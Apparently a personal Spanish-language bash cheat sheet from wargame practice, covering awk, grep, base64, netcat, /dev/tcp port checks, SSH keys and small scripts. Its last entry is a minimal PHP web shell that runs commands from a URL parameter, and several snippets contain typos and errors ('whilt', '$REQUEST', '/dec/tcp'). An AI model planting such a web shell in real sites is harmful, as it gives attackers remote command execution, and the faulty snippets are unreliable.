BASH SCRIPTING RELATED NOTES
============================

# 7Z 
# --

    # Listar contenido de un fichero comprimido:
    $ 7z l data.gzip

    # Extrar contenido de fichero comprimido:
    $ 7z x data.gzip


# AWK
# ---

    # Cargar la línea 2 de un fichero:
    $cat /etc/passwd | awk 'NR==2'

    # Buscar una cadena dentro de un fichero:
    $awk "/<cadena>/" data.txt

    # Selecciona un determinado elemento:
    $awk '/<cadena_texto>/' | awk '{print $1}'

    # Forma cómoda de seleccionar el último elemento de una línea:
    $awk '/<cadena_de_texto>/' data .txt | awk 'NF{print $NF}'


# CODIFICATIONS
# -------------

    A) BASE64:

        # Codificar texto -> Base64
        $ echo "hola prueba" | base64

        # Decodificar Base64 -> texto
        $ cat data.txt | base64 -d

    B) HEX:

        # Codificar texto -> Hex
        $ echo "hola prueba" | xxd

        # Codificar texto -> Hex y luego hacer un "cat" para quedarnos solo con la parte hexadecimal:
        $ echo "hola prueba" | xxd -ps

        # Decodificar Hex -> Texto
        # cat data.txt | xxd -r

    # 


# CONDITIONALS
# ------------

    # If file exists:
    if [ -f <file_name>]

    # If file doesn't exist:
    if [ ! -f <file_name>]

    # If directory exists:
    if [ -d <directory_name>]

# CUT
# ---

    # Selecciona una parte de una línea. En este caso nos queremos quedar con "Hola":
    $ echo "Hola     que tal" | cut -d ' ' -f 1


# /dev/tcp/127.0.0.1/<port>
# --------------------------

    # Si queremos comprobar si un puerto (el 30000 por ejemplo) está a la escucha:
    $ echo '' > /dec/tcp/127.0.0.1/30000
    # Miramos el código de estado que nos devuelve:
    $ echo $?
    0 ==> Exitoso. Por lo tanto, el puerto está abierto.

    # Otro ejemplo:
    $ echo '' > /dev/tcp/127.0.0.1/30000 && echo "[*] Puerto abierto" || echo "[*] Puerto cerrado"
    # Si queremos quitar el "stderr":
    $ bash -c "echo '' > /dev/tcp/127.0.0.1/30000" 2>/dev/null && echo "[*] Puerto abierto" || echo "[*] Puerto cerrado"


# Declare
# -------

    # Decalaración de variables:

    declare -r ==> read only
    declare -i ==> integer
    declare -a ==> array
    declare -f ==> function


# DISOWN
# ------

    # Cuando arrancamos una aplicación por consola y queremo independizar ese programa de la consola:
    $disown


# FIND
# ----

    # Find all files in the current directory:
    $find . -type f

    # Print output from a "find" command:
    $find . -type f -printf "%f\t%p\t%u\t%g\t%m\n" | column -t

    # Search for a specific filename:
    $find . -name <nombre_fichero> 

    # Fichero de tipo "readable", "no executable" y de tamaño 1033 bytes:
    $find . -type f -readable ! -executable -size 1033c


# File Attributes
# ---------------

    # Lista atributos especiales:
    $lsattr file.txt

    # Modificar atributos especiales:
    $chattr +i -v file.txt
        +i: immutable

# FILE
# ----

    # Nos devuelve información del fichero que le indiquemos:
    $file cuadro.jpg


# GIT
# ---

    # Comprobar los commits (en formato "pageable"):
    $ git log -p

    # Listar los diferentes "branches" de un repositorio:
    $ git branch -r

    # Migrar a otro "branch":
    $ git checkout <branch_name>

    # Listar los "tags" de un repositorio:
    $ git tag

    # Mostrar el contenido de un "tag":
    $ git show <tag_name>


# GREP
# ----

    # Buscar cadena de texto:
    $grep '/<cadena_texto>/' data.txt
    
    # Buscar cadena con RegEx. Todo lo que empiece por "root":
    $cat /etc/passwd | grep "^root`" 

    # Buscar cadena con RegEx. Todo lo que empiece por "hola" y termina por "a" de hola:
    $cat /usr/share/wordlists/rockyou.txt | grep "^hola$" 

    # Si queremos ver en qué línea hay la coincidencia del GREP, añadimos un "-n" al final:
    $cat /usr/share/wordlists/rockyou.txt | grep "^hola$" -n

    # Quitar lineas que contegan un criterio:
    $ grep /etc/passwd | head -n 5 | grep -v root

    # Si queremos quitar líneas que contenga un DOBLE MATCHING de palabras:
    $ grep /etc/passwd | head -n 5 | grep -v -E "Wrong|Please"


# lsof
# ----

    # Listar los procesos que están corriendo sobre el puerto que le indiquemos (el 22 en este ejemplo):
    $ lsof -i:22


# NANO
# ----

    # Deshabilitar el sangrado:
    Pulsamos "ESC + i"
    

# NETCAT
# ------

    # Cuando queremos enviar una cadea a un puerto:
    $ echo "<cadena>" | nc localhost 300000
    # Otra forma sería por "Telnet"

    # Dejar un puerto a la escucha:
    $ nc -nlvp 5757



# OpenSSL
# -------

    # Cliente: conectarme a un equipo
    $ openssl s_client -connect <ip>:<port>
    $ openssl s_client -connect 127.0.0.1:30001


# PS
# --

    # Listar todos los comandos que están ejecutando actualmente en el sistema:
    $ ps -eo command


# PWDX
# ----

    # Permite listar la ruta bajo la cual se ha iniciado el proceso.
    $ pwdx <pid>

# Redirecciones: STDIN, STDERR
# ----------------------------

    # Si no queremos mostrar los errores por consola de la ejecución de un comando:
    $find / -user pepe -group pepegroup -size 33c 2>/dev/null
        2: codígo interno de bash para los errores.

    # Ejecución de un programa sin mostrar los outputs:
    $firefox > /dev/null

    # Si además no queremos que los errores se reporten por consola:
    $firefox > /dev/null 2>&1

    # Y por último, si ademas queremos dejarlo en segundo plano:
    $firefox > /dev/null 2>&1 &


# REV
# ----

    # Revertir cadenas:
    $awk '/<cadena_texto>/' data.txt | rev


# SED
# ----

    # Substitucion de cadenas. Solo la primera ocurrencia:
    $cat /etc/passwd | head -n 1 | sed 's/<palabra_a_sustituir>/<nueva_palabra>/'

    # Substitucion de cadenas. Todas las ocurrencias:
    $cat /etc/passwd | head -n 1 | sed 's/<palabra_a_sustituir>/<nueva_palabra>/g'

    # Eliminación de cadena (== substitución por cadena vacia):
    $cat /etc/passwd | head -n 1 | sed 's/<palabra_a_sustituir>//g'


# SORT
# ----

    # Ordenar líneas de un fichero:
    $cat data.txt | sort


# SS (Socket Statistics)
# ----------------------

    # Comando similar a "netstat".

# SSH
# ----

    # Conectar por puerto concreto:
    $ssh <user>@<host> -p <port>


# SSH-KEYS
# --------

    # Dentro de la ruta del usuario tendremos una carpeta ".ssh/". En ella si no tenemos nada, crearemos un par de claves:
    $ cd /home/<user>/.ssh
    $ /home/<user>/.ssh > ssh-keygen 

            Enter passphrase (empty for no passphrase): <No metemos nada>
            <Enter> de nuevo
            <Enter> de nuevo
    # Se nos habrán creado dos ficheros: "id_rsa" y "id_rsa.pub"
    # Si quisieramos acceder a este equipo donde hemos creado las claves ssh, tendríamos que copiar el "id_rsa.pub" como "authorized_keys":
    $ cp id_rsa.pub authorized_keys

    # Conectarnos haciendo uso de la "clave privada":
    $ ssh -i <sshkey.private> <user>@<ip>
    $ ssh -i sshkey.private pepe@localhost



# STRINGS
# -------

    # Listar cadenas de caracteres imprimibles de un fichero:
    $strings data.txt


# SEQ
# ---

    # Crear una secuencia de número del 0000 - 9999:
    $ for i in {0000..9999}; do echo $i; done

# TR (transform string or delete character)
# -----------------------------------------

    # Sustituir espacios de una frase por saltos de línea:
    $ cat data.txt | base64 -d | tr ' ' '\n'


# UNIQ
# ----

    # Listar cadenas/líneas únicas en un fichero:
    $cat data.txt | sort | uniq -u
        -u: líneas únicas, las que no se repitan.


# UNIQUE
# ------
    
    # Listar cadenas/líneas únicas en un fichero:
    $cat data.txt | sort | unique


# XARGS
# -----

    # Mostrar (un "cat") de los resultados de un comando:
    $find . -name .hidden | xargs cat

    # Otro ejemplo. A todos los ficheros de salida se les hace un "cat":
    $find . -type f | xargs cat

    # Cuando hagamos un "xargs cat" y el fichero incluya muchos espacio al final, podremos eliminarlos de la siguiente manera:
    $find . -type f | xargs cat | xargs


==========================================================================================================

SCRIPTS
=======

1) Script contador de líneas de un fichero:

    #!/bin/bash

    contador=1

    while read line; do
        echo "Línea $contador: $line"
        let contador+=1
    done < /etc/passwd


2) Script recursivo: descomprimir un fichero y su contenido de manera recursiva

    #!/bin/bash

    name_compressed=$(7z l content.gzip | grep "Name" -A 2 | tail -n 1 | awk 'NF{print $NF}')
    7z x content.gzip > /dev/null 2>&1

    whilt true; do
        7z l $name_compressed > /dev/null 2>&1
        
        if [ "$(echo  $?)" == "0" ]: then 
                decompressed_next=$(7z l $name_compressed | grep "Name" -A 2 | tail -n 1 | awk 'NF{print $NF}')
                7z x decompressed_next > /dev/null 2>&1 && name_compressed =$decompressed_next
        else
                cat $name_compressed; rm data* 2>/dev/null 
                exit 1
        fi
    done

3) Trapping: You can use the trap builtin to handle a user pressing ctrl-c during the execution of a Bash script. e.g. if you need to perform some cleanup functions.

    trap ctrl_c INT

    function ctrl_c(){
            echo -e "\n${redColour}[!] Saliendo...\n${endColour}"

            rm ut.t* money* total_entrada_salida.tmp entradas.tmp salidas.tmp bitcoin_to_dollars 2>/dev/null
            tput cnorm; exit 1
    }

4) PHP: shell.php

    <?php

        echo "<pre>" . shell_exec($REQUEST['cmd']) . "</pre>";

    ?>

    Luego abrimos un navegador y lo usaremos de la siguiente manera:

        http://<ip>/shell.php?cmd=whoami


